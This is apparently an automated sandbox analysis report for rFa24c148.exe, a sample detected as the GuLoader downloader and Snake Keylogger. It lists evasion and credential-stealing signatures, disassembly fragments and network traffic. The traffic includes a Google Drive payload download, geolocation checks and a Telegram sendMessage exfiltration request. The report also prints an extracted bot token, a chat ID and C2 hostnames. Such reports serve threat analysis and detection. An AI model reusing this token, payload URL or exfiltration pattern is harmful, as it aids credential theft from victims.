Windows Analysis Report
rFa24c148.exe

Overview

General Information

Sample name: rFa24c148.exe
Analysis ID: 1543495
MD5: 7644ebbf786053ffaf95dbe86b7de5d4
SHA1: 5d563fb10f6d71049ae5f69fb6ccb9f2217ddf32
SHA256: 0b7ba80811d300aefe42de77b7b8fb2d5b6f9a8d4f2cf3d1213b6fead5efb59b
Tags: exe, user-Porcupine

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "8148338634:AAFvLNrhxaF7bMPzQMLbUnueRMJvDIi5kcU", "Chat_id": "7698865320", "Version": "4.4"}
Source: rFa24c148.exe ReversingLabs: Detection: 15%
Source: rFa24c148.exe Virustotal: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_367487A8 CryptUnprotectData, 4_2_367487A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_36748EF1 CryptUnprotectData, 4_2_36748EF1
Source: rFa24c148.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F2C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 0016F45Dh 4_2_0016F4AC
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 0016FC19h 4_2_0016F974
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36552C19h 4_2_36552968
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 365531E0h 4_2_36552DC8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655E501h 4_2_3655E258
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655E0A9h 4_2_3655DE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655E959h 4_2_3655E6B0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655F209h 4_2_3655EF60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655EDB1h 4_2_3655EB08
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36550D0Dh 4_2_36550B30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36551697h 4_2_36550B30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655F661h 4_2_3655F3B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_36550040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655FAB9h 4_2_3655F810
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655D3A1h 4_2_3655D0F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655CF49h 4_2_3655CCA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655D7F9h 4_2_3655D550
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 365531E0h 4_2_3655310E
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3655DC51h 4_2_3655D9A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36747119h 4_2_36746E70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36747EB5h 4_2_36747B78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36749280h 4_2_36748FB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36744D21h 4_2_36744A78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674D146h 4_2_3674CE78
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36743709h 4_2_36743460
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674F136h 4_2_3674EE68
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36741CF9h 4_2_36741A50
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367402E9h 4_2_36740040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367462D9h 4_2_36746030
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674BF06h 4_2_3674BC38
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367448C9h 4_2_36744620
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674DEF6h 4_2_3674DC28
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36746CC1h 4_2_36746A18
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367432B1h 4_2_36743008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36740B99h 4_2_367408F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674F5C6h 4_2_3674F2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36745179h 4_2_36744ED0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36747571h 4_2_367472C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674C396h 4_2_3674C0C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674E386h 4_2_3674E0B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36742151h 4_2_36741EA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36740741h 4_2_36740498
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then mov esp, ebp 4_2_3674B081
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36746733h 4_2_36746488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36742A01h 4_2_36742758
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674C826h 4_2_3674C558
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36740FF1h 4_2_36740D48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674E816h 4_2_3674E548
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367479C9h 4_2_36747720
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367455D1h 4_2_36745328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674B5E6h 4_2_3674B318
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367425A9h 4_2_36742300
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674D5D6h 4_2_3674D308
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367418A1h 4_2_367415F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674CCB6h 4_2_3674C9E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674ECA6h 4_2_3674E9D8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36745E81h 4_2_36745BD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then mov esp, ebp 4_2_3674B1C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36742E59h 4_2_36742BB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36741449h 4_2_367411A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674BA76h 4_2_3674B7A8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674DA66h 4_2_3674D798
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 36745A29h 4_2_36745780
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 3674FA56h 4_2_3674F788
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B6970h 4_2_367B6678
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B42B6h 4_2_367B3FE8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B4746h 4_2_367B4478
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BD768h 4_2_367BD470
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BAC60h 4_2_367BA968
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B0C2Eh 4_2_367B0960
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8158h 4_2_367B7E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B3E26h 4_2_367B3B58
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BEF50h 4_2_367BEC58
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BC448h 4_2_367BC150
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B5E16h 4_2_367B5B48
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B9940h 4_2_367B9648
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B030Eh 4_2_367B0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B6E38h 4_2_367B6B40
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B3506h 4_2_367B3238
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BDC30h 4_2_367BD938
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BB128h 4_2_367BAE30
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B54F6h 4_2_367B5228
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8620h 4_2_367B8328
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BF418h 4_2_367BF120
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B2BE6h 4_2_367B2918
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BC910h 4_2_367BC618
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B19DEh 4_2_367B1710
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B9E08h 4_2_367B9B10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B4BD7h 4_2_367B4908
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B7300h 4_2_367B7008
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BE0F8h 4_2_367BDE00
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B22C6h 4_2_367B1FF8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BB5F0h 4_2_367BB2F8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B10BEh 4_2_367B0DF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8AE8h 4_2_367B87F0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BF8E0h 4_2_367BF5E8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BCDD8h 4_2_367BCAE0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B6347h 4_2_367B5FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BA2D0h 4_2_367B9FD8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B079Eh 4_2_367B04D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B77C8h 4_2_367B74D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BE5C0h 4_2_367BE2C8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BBAB8h 4_2_367BB7C0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B5986h 4_2_367B56B8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B8FB0h 4_2_367B8CB8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BFDA8h 4_2_367BFAB0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B3076h 4_2_367B2DA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BD2A0h 4_2_367BCFA8
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B1E47h 4_2_367B1BA0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BA798h 4_2_367BA4A0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B5066h 4_2_367B4D98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B7C90h 4_2_367B7998
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BEA88h 4_2_367BE790
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B2756h 4_2_367B2488
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367BBF80h 4_2_367BBC88
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B154Eh 4_2_367B1280
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367B9478h 4_2_367B9180
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1FE8h 4_2_367F1CF0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F0338h 4_2_367F0040
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1B20h 4_2_367F1828
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1190h 4_2_367F0E98
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F1658h 4_2_367F1360
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F0801h 4_2_367F0508
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then jmp 367F0CC8h 4_2_367F09D0
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E70
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36833E60
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830A10
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_368308DE
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_36830960

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2028/10/2024%20/%2012:44:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.6.168
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.18.110:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 28 Oct 2024 01:03:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: rFa24c148.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033525000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
Source: rFa24c148.exe, 00000004.00000003.2103239778.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000003.2103452898.0000000002E26000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: rFa24c148.exe, 00000004.00000002.2993781136.0000000033601000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: rFa24c148.exe, 00000004.00000002.2993781136.00000000335FC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, rFa24c148.exe, 00000004.00000002.2971653916.00000000048B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6dk
